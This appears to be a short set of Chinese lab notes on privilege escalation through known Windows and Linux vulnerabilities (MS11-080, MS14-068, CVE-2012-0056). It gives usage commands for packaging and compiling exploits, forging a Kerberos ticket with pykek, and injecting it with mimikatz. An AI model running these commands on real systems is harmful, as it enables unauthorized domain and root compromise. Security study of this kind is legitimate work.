利用漏洞提权

利用漏洞提权

Ms11-080
Kb2592799

• https://technet.microsoft.com/library/security/ms11-080

Pyinstaller

• https://pypi.python.org/pypi/PyInstaller/2.1

python pyinstaller —onefile ms11-080.py
Pywin32

• http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/

MS11-046
DoS

Ms14-068
库
https://github.com/bidord/pykek
ms14-068.py -u user@lab.com -s userSID -d dc.lab.com
拷贝 TGT_user1@lab.com.ccache 到windows系统
本地管理员登陆
mimikatz.exe log “kerberos::ptc TGT_user@lab.com.ccache” exit

• Ubuntu11.10

http://oldreleases.ubuntu.com/releases/11.10/
gcc

• sudo apt-cdrom add && sudo apt-get install gcc
• gcc 18411.c -o exp

CVE-2012-0056

• /proc/pid/mem

kernels >=2.6.39
http://blog.zx2c4.com/749